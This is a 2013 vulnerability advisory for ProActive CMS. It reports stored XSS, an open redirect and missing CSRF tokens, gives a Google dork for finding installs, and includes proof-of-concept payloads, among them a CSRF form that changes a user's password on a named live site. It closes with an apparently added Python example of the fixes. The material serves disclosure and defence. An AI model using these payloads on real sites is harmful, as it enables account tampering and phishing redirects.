ProActive CMS XSS & CSRF & Open Redirect

2013.01.15
Credit: Rafay Baloch
Risk: Low
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: ProActive CMS Multiple Vulnerabilities
# Google Dork: intext:"Powered by Proactive CMS"
# Exploit Author: Rafay Baloch
# Vendor Homepage: http://www.proactivecms.com
# Tested on: Linux

Stored Cross Site Scripting:

http://professional.inbusiness.com.au/admin.php?action=newuser

Insert your payload: "><img src=x onerror=prompt(0);>

The newuser field does not properly sanitize the input, resulting in a stored XSS.

Open Redirect:

An open redirect issue was also found. POC:

http://professional.inbusiness.com.au/admin.php?action=http://rafayhackingarticles.net

Just replace http://rafayhackingarticles.net with your own domain.

Missing CSRF Tokens:

Most of the forms are missing CSRF tokens. To be honest, one of the most insecure CMSs I have ever seen.

http://professional.inbusiness.com.au/admin.php?action=edituser&id=24

The following POC could be altered to change a user's details:

<html>
<body>
<form action="http://professional.inbusiness.com.au/admin.php?action=saveuser&id=24" method="POST">
<input type="hidden" name="groupreadvalue" value="" />
<input type="hidden" name="groupreadallvalue" value="" />
<input type="hidden" name="id" value="24" />
<input type="hidden" name="password1" value="tony123" />
<input type="hidden" name="firstname" value="Tony" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="initials" value="V" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="lastname" value="Badger" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="dob" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="email" value="tony&#46;badger&#64;sales&#46;fake&#46;com" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="telephone" value="&#43;13" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="fax" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="address" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="suburb" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="postcode" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="business&#95;name" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="division" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="position" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="building" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="x" value="30" />
<input type="hidden" name="y" value="10" />
<input type="hidden" name="groupReadList" value="&#44;Sales" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

RHA: http://rafayhackingarticles.net
http://twitter.com/rafaybaloch
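The three issues above share one root cause: request parameters (action, the new-user name, the saveuser form fields) are trusted without validation, output encoding, or proof that the request came from the application's own page. The following Python block is an added illustration of the server-side checks that close each of them; it is not ProActive CMS code, and the action names, session dict and handler are assumptions for the example.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Constructed allowlist of admin.php handler names (assumed; the real CMS's
# handler names are not known from the advisory).
ALLOWED_ACTIONS = {"newuser", "edituser", "saveuser"}


def resolve_action(action: str):
    """Map ?action= to a local handler name, never to a redirect target.

    Anything carrying a scheme or host (http://..., //host, javascript:) is
    rejected, and so is any name outside the allowlist. This removes the
    open redirect: the parameter can only select a known handler."""
    parts = urlsplit(action)
    if parts.scheme or parts.netloc or action.startswith("//"):
        return None
    return action if action in ALLOWED_ACTIONS else None


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the session and embed it in each form."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def verify_csrf_token(session: dict, submitted) -> bool:
    """Constant-time check that the submitted token matches the session's.

    A cross-site form (like the saveuser POC) cannot read the victim's
    session token, so its POST fails here before any field is saved."""
    expected = session.get("csrf_token")
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected, submitted)


def render_user_name(name: str) -> str:
    """Encode stored data at output time so a stored payload stays text."""
    return html.escape(name, quote=True)


def handle_saveuser(session: dict, form: dict):
    """Gatekeeper for the saveuser action: CSRF check, then safe rendering.
    Returns the encoded name on success, None when the request is refused."""
    if not verify_csrf_token(session, form.get("csrf_token")):
        return None
    return render_user_name(form.get("firstname", ""))
```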

References:

http://www.proactivecms.com

